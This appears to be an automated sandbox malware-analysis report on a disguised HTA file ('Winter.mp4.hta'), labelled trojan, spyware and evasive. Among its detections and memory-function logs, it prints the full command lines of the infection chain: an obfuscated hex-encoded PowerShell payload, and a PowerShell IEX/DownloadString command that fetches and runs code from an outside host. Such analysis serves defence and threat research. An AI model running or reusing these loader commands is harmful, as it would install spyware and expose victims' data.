                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.5:49975 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49982 version: TLS 1.2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00521740 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,8_2_00521740
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00521740 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,8_2_00521740
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005221CA GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,8_2_005221CA

                System Summary

                barindex
                Source: Process Memory Space: powershell.exe PID: 6624, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D5CB782_2_04D5CB78
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D5D4482_2_04D5D448
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04D5C8302_2_04D5C830
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00B9738F4_2_00B9738F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00B9A5394_2_00B9A539
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00B9A5484_2_00B9A548
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00B946604_2_00B94660
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00B946504_2_00B94650
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0465AAB34_2_0465AAB3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_046544384_2_04654438
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_046591204_2_04659120
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0465EC704_2_0465EC70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04657AE04_2_04657AE0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04657AF04_2_04657AF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04653AA34_2_04653AA3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04653AA84_2_04653AA8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0466B7204_2_0466B720
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0466CFC04_2_0466CFC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_075721D04_2_075721D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081E73504_2_081E7350
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081E78184_2_081E7818
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081E00064_2_081E0006
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081E00284_2_081E0028
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081E00404_2_081E0040
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081E609C4_2_081E609C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081E60A84_2_081E60A8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081E6D1C4_2_081E6D1C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081E59F84_2_081E59F8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081E6A6A4_2_081E6A6A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081E73414_2_081E7341
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081E67D94_2_081E67D9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_081E67E04_2_081E67E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004FD0718_2_004FD071
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005262408_2_00526240
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00501A708_2_00501A70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005123B08_2_005123B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005004AC8_2_005004AC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005155608_2_00515560
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005265E08_2_005265E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005085928_2_00508592
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004F86408_2_004F8640
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0051B7448_2_0051B744
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005010568_2_00501056
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0051A0408_2_0051A040
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0051F8708_2_0051F870
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005130768_2_00513076
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052D8108_2_0052D810
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052D0208_2_0052D020
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005068F78_2_005068F7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005178978_2_00517897
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0050D0808_2_0050D080
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052D0B08_2_0052D0B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004FA8B08_2_004FA8B0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004F59408_2_004F5940
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0051514E8_2_0051514E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052E1108_2_0052E110
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0051690B8_2_0051690B
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004F39208_2_004F3920
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052A1208_2_0052A120
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005111C08_2_005111C0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005159F08_2_005159F0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005271E08_2_005271E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004F61A08_2_004F61A0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005092708_2_00509270
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052CA708_2_0052CA70
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004FCA638_2_004FCA63
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004F92108_2_004F9210
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00525AD08_2_00525AD0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004FB2DC8_2_004FB2DC
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004F42D08_2_004F42D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052DAE08_2_0052DAE0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00515AE58_2_00515AE5
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0051BA958_2_0051BA95
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052B2A08_2_0052B2A0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0050D3508_2_0050D350
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0051514E8_2_0051514E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00514B4E8_2_00514B4E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004FB30C8_2_004FB30C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005178978_2_00517897
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0051C30F8_2_0051C30F
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005213208_2_00521320
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00527B2A8_2_00527B2A
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005163D68_2_005163D6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0051ABC98_2_0051ABC9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0051A3C88_2_0051A3C8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00512B808_2_00512B80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052BBBE8_2_0052BBBE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00511C718_2_00511C71
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0050E4608_2_0050E460
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052AC638_2_0052AC63
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004F4C008_2_004F4C00
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004F74108_2_004F7410
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005184DF8_2_005184DF
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005244F18_2_005244F1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004FB4E68_2_004FB4E6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004FB4E68_2_004FB4E6
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00504D7D8_2_00504D7D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005175608_2_00517560
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00525D308_2_00525D30
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00515DD78_2_00515DD7
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004F95D08_2_004F95D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052DDF08_2_0052DDF0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005045808_2_00504580
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005075BE8_2_005075BE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052CDA08_2_0052CDA0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00505E4D8_2_00505E4D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00524E608_2_00524E60
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004F5E008_2_004F5E00
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0051DE298_2_0051DE29
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052AE2E8_2_0052AE2E
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004F66308_2_004F6630
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0050C6D08_2_0050C6D0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0052CEC08_2_0052CEC0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005136E08_2_005136E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005187518_2_00518751
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005017538_2_00501753
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0051D73D8_2_0051D73D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_004F2F208_2_004F2F20
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0050B7E08_2_0050B7E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00504F808_2_00504F80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00503FB08_2_00503FB0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00511FB08_2_00511FB0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00511FAE8_2_00511FAE
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 004F7FC0 appears 36 times
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 00503FA0 appears 56 times
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 3823
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 3823Jump to behavior
                Source: Process Memory Space: powershell.exe PID: 6624, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: classification engineClassification label: mal100.troj.spyw.evad.winHTA@9/6@3/3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_005265E0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,8_2_005265E0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4696:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Rlhpakclzrt
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_scexr12o.sg5.ps1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
                Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\Winter.mp4.hta"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function rOnH($ZugfP){return -split ($ZugfP -replace '..', '0x$& ')};$hcNM = rOnH('C3930BC54871F266AFF2C12A03BE01BAC619730D50B7B296848B0CE355EF4AAD63DAD551CF518740CFF825344B7C3E8930ABD7E087DC165F9FA695481870BD210973CEFFE5F8743015E9E067BE32B8D28FC34D427F57004108D4924938D42B9C68E78C8BAEEC7B88EDBF7E26D65BBEB339C85352398379212A4DA0FDA9378FA9EE2979EF8C68B2C848B07239F0FE9081E18A3E2747428EACAB76496A5D46ECC618715969BEB2AA550FCC19D2801E7412D5CCB10D7FC87B3CCFCA2C5142FFF0A92BF434E5B0634E25F43D5A1D49AF292EF18995535EADD316387361090364FCDB53CF147D38015CDE7C196BCB2487A645FE6E879997DB0B013559AE94AF7AE0A057520D706AABBBB3C4599241DC59E43AF4317BBF33FF72B63C4D6F40A4CF4FBA5443410E7D4FDBB2DAAB0B099C9CBBDF16A73778ACB0AAF9970D84B1C2FE02073C14045A04F38EC73D1F5FE068051B40E010417AE6630AF70E00695C608BC0861330974406C2434CDEF8351AA4C08151E713B3E1161BE6479227D497878812334F53852E161933DF3AC49002F901EF720BD24EBC005803CC3FB5D9730A35474DE935BB0DA3CD0DB74DD2F1A75D4C2C82DEF41F1F7E055AA35E28F60EBC5D1AA4CF8B043E2DB0C3431EC5B92D16094A177AF2C20A61C912B7DE1A05E9AC70C3FC34F259AFBC8229DE2C7404FA77695B9B9B64B6CCCC15261DD3287767966C69CA3447D29F6C28AAED13F5700DD3C2344BBBC440EF822FA03ED85A66458F8096A217892CE5BD92B17A636A13078002A9F12DF30BBC21FBFC27825674E1F156C08B1F7BE8110450AAAFE84A212E2539E9D958C27CBA9258E0F2EB2302B3C025C3E8F2AF1D4975B918F51A7E4B0E2D658450A8BAA98DF067B355E280E6F33E6D6E729F9BF2A721E484C32FC60E22909D4A00F86690A401E2249B69A64B01B2EF84D697A10E34BFB44195CEFA63C8603AC785033B7F295FB45F066E298773D832DB3E9A5C2228A617A7493C760CF7B8A234974A7D9FFE59773D18E13F4C2B106A18753CB10177D79E9329A5839F3BBD922320BE5C516B60190FBF08E4F48DD96D3C6FC263511D230C8EE4C5016FCAF3F85211AA23D5D686382382D564C6E8DB3107FB4842199CEAABF6EB258752F65C408D2C95BA3AC3C4BA6634C579D8E2AF7478D305A2B454111CA906551BEDE47D883C897D123DD54DB270EDB40162EDF8558AB2673CED4556848FBD0F0EA7E491C6CB594EC95A7DC54749D99912A60C79DCA4D598AA2335146B6D936341E271B5EE53DC7E88ABFE799563C3F66B92D8E53182F74FE62D5E058B1D6A532974692D259673F216D5E037875DF42348A3CBC56B68E7F61BB04F8DE43B8B56AF5F12EE9CE635F60999BD302D33D994F58D54EACF34355DBB7E858E578C3C464D9DFE385CA2BA8CA5920FA0CD69D14616CF89B14B05812B1E052ECCE3F7FB706D97B865FD0C6506CE32F646039B92F147F82037E1BCA4A16EDE04A52F754852062CC5FFE79F1C1811C2A4EE43FF38387C4CD11A2EDCA6C57216DFC5D9E29ADFF0D5ACCF05998C02101CD723667780F3ECE0C9D8A3501F34E27653C8CC454AC1B9CFD63C7077F0256949AD3E3DAF6C6B099A8FDFBD7D13B638DE640A14ACFA2ED35860392CBFAF118DE0BA089D071F46AB6709E49AD48A6BCB90F215D487648968F3D24E4F165E6104C06BFD0522BF67BD6FC0E5E50796821857A2FB3F2C891AABBA7EF8AD692660794579DB6A00D57FBAF9F2AD64863974071C4D7E8C8BE2BDF8923280C6936769E41E84567C4940EBCD713F945DF7292AD0C75B27F4BEBDD48B6A53C89741AA6E5C0A8E6FA33C1B74178F50FA6FB6249B241DABE92267BC0A3DD4ADC73A94749C2E2EEFFA8DA6F2A045FB97C908B9436225EDF216DAF831E28AC1D8377C036AA3F2324DB4B8937836B29B3712AD27EBE29B03DB7930C6B09326
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command & {IEX ((New-Object Net.WebClient).DownloadString('https://cdn1.klipbazyxui.shop/vankok.vstx'))}
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
